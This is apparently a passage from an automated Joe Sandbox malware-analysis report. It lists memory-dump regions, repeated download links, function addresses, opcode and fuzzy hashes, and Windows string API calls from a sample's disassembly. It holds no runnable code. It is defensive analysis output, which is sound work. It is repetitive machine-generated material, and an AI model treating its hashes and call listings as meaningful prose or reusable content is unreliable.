                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: C<}w$Uq8_
                                • API String ID: 0-956720481
                                • Opcode ID: 4df41f80a89bcf1df4719074158ea36da2afb2d9a186475e4db95cb2e4289430
                                • Instruction ID: a91ee5069bb51b971c7c7928e317414acc3627e6e57e94ea6778d19f3e67ad0f
                                • Opcode Fuzzy Hash: 4df41f80a89bcf1df4719074158ea36da2afb2d9a186475e4db95cb2e4289430
                                • Instruction Fuzzy Hash: 03B2F6F3A082049FE314AE2DEC8567AFBE5EF94720F16493DEAC4C3744EA3558058697
                                Function 00A5D37B Relevance: 3.2, Strings: 2, Instructions: 722COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: S|~$}
                                • API String ID: 0-170503413
                                • Opcode ID: f8333f14f0adf5f129bac210b9b61dc2271615e4e7d97ce2d4b9bb9bed547f3a
                                • Instruction ID: e4532cf8e8420e9c1ddc5ba7acc3249aaddcde32ee2bb9e2e1a1378148c04086
                                • Opcode Fuzzy Hash: f8333f14f0adf5f129bac210b9b61dc2271615e4e7d97ce2d4b9bb9bed547f3a
                                • Instruction Fuzzy Hash: 76226BF3A0C2109FD3046E2DED8577ABBE9EF94760F1A893DEAC4D7744E53588058682
                                Function 00916649 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ht}
                                • API String ID: 0-142355101
                                • Opcode ID: ee8fd3be6b770b096dd55fada8d39bd5a8ac21abd2a9874264c30e2a8865ef9a
                                • Instruction ID: f3523b6690719c2046ef8d5420b87553c12a666aa26ce6c4d0f83b0a7fbc62ba
                                • Opcode Fuzzy Hash: ee8fd3be6b770b096dd55fada8d39bd5a8ac21abd2a9874264c30e2a8865ef9a
                                • Instruction Fuzzy Hash: 8751B5F7D092209BE3145D2DEC85366BAD6DFA4720F1B463DDF88A7784E53A4C1482C2
                                Function 009BFADD Relevance: .2, Instructions: 222COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 404e839bf361db8a6f8988035219df120f01717f8ce0e869a37a1b4eede78625
                                • Instruction ID: 635cb34895ac02c6036af6fa23d36044214cdc4048f13c9af4006052a7e73f57
                                • Opcode Fuzzy Hash: 404e839bf361db8a6f8988035219df120f01717f8ce0e869a37a1b4eede78625
                                • Instruction Fuzzy Hash: 74616DF3A482005BF3046A3DEC8576BBBD6EBC4760F1B453DEBC887780D97958058692
                                Function 00A009A3 Relevance: .2, Instructions: 173COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67f87df66e8752d05f5a1b58bc57039ec68f4c73908044fbd2c4a56c459e9549
                                • Instruction ID: aa93c0be4dfd12aa00834f2f98b958fe7cdc686ec49dfc3add3ec512bf7d4e99
                                • Opcode Fuzzy Hash: 67f87df66e8752d05f5a1b58bc57039ec68f4c73908044fbd2c4a56c459e9549
                                • Instruction Fuzzy Hash: 8F5149F3B082005BE304AA3DEC8577BB7E9EF94720F1A453DE6C9C3740E93998048296
                                Function 00A901EB Relevance: .2, Instructions: 165COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a2833da2788437beac8057a9f0a1bfa213fe603d2d7e70013597479c7691552
                                • Instruction ID: 82da3d3690ae2c5931f6fe6c98c11692533ae6a7e2ed121e1537a23e1862b6b5
                                • Opcode Fuzzy Hash: 9a2833da2788437beac8057a9f0a1bfa213fe603d2d7e70013597479c7691552
                                • Instruction Fuzzy Hash: EF51E1F260C200DFD740AF28DC85BBAB7F5EB94350F26852DE6C5C7B44E23558408687
                                Function 00AEF593 Relevance: .2, Instructions: 165COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7091a56d144c25f228fd733eb780bc9e875c67dcb43dabe7c93cc60c8c106c30
                                • Instruction ID: 859ded773d2f63291c7c68dedd098a0631617cbbcd5be55b8ee5008b2d019288
                                • Opcode Fuzzy Hash: 7091a56d144c25f228fd733eb780bc9e875c67dcb43dabe7c93cc60c8c106c30
                                • Instruction Fuzzy Hash: AA5126F390C240DFD3086E3ADD9467AB7F5EBA4320F398A3EE5C642788E97548019253
                                Function 00A358B4 Relevance: .1, Instructions: 145COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 526c556ecdee006a3db1fc680238052605690e1d2ce3dcd36f0f558d2f60df65
                                • Instruction ID: 26159da00b313f3cd9b4234ba86ad36d6051e830e1e2f8d27ffad29eb85f7c4a
                                • Opcode Fuzzy Hash: 526c556ecdee006a3db1fc680238052605690e1d2ce3dcd36f0f558d2f60df65
                                • Instruction Fuzzy Hash: C341E7F3A086005FF3086E1CEC9577AB6D5EF94310F1A453DDAC993740E93968518686
                                Function 00A1CBE9 Relevance: .1, Instructions: 138COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd718c09eb89b4234d9c48cb9db7351715aeacdd6be7b69a275ad51e0b275b8b
                                • Instruction ID: 2fc4b272a41bbbaa83641e1fa4d5bcfebdcf6258f081646753f3f117272352a8
                                • Opcode Fuzzy Hash: bd718c09eb89b4234d9c48cb9db7351715aeacdd6be7b69a275ad51e0b275b8b
                                • Instruction Fuzzy Hash: 9041D4F3A082049FE300BA19EC48B6BBBE6DFD4320F16853DD69487784EA7558158697
                                Function 0090B5E7 Relevance: .1, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 066b4e0457d97a04cdd7c8554ee35bc84951a389b081664b534c8ce55b341e95
                                • Instruction ID: 3451b298fbdfc361b3b3fa1f6e50d1e658fba18bab80bab570ebda1f28b0d70e
                                • Opcode Fuzzy Hash: 066b4e0457d97a04cdd7c8554ee35bc84951a389b081664b534c8ce55b341e95
                                • Instruction Fuzzy Hash: 294115F3B196044BF3085929EC94336B6CBEBD8324F2B823D9A88977C4DC7C580A4295
                                Function 006B85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 006B86AA
                                • StrStrA.SHLWAPI(?,0133E998), ref: 006B86CF
                                • lstrcpyn.KERNEL32(008D93D0,?,00000000), ref: 006B86EE
                                • lstrlen.KERNEL32(?), ref: 006B8701
                                • wsprintfA.USER32 ref: 006B8711
                                • lstrcpy.KERNEL32(?,?), ref: 006B8727
                                • StrStrA.SHLWAPI(?,0133E9C8), ref: 006B8754
                                • lstrcpy.KERNEL32(?,008D93D0), ref: 006B87B4
                                • StrStrA.SHLWAPI(?,0133EDD0), ref: 006B87E1
                                • lstrcpyn.KERNEL32(008D93D0,?,00000000), ref: 006B8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 86baf7854502865d76c28dea4d31067177417489646e6c80c3cbffcab511bded
                                • Instruction ID: 5ff726808e6b63e257e8430f0b31928c90d80eb17e5a8dc0fb66651d62f004f6
                                • Opcode Fuzzy Hash: 86baf7854502865d76c28dea4d31067177417489646e6c80c3cbffcab511bded
                                • Instruction Fuzzy Hash: 7DF14DB1901115EFCB10DB68DD48ADA77BAFF88300F14469AE949E7350DF70AE45CBA0
                                Function 006A1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1F9F
                                • lstrlen.KERNEL32(01339358), ref: 006A1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1FE3
                                • lstrlen.KERNEL32(006D1794), ref: 006A1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A200E
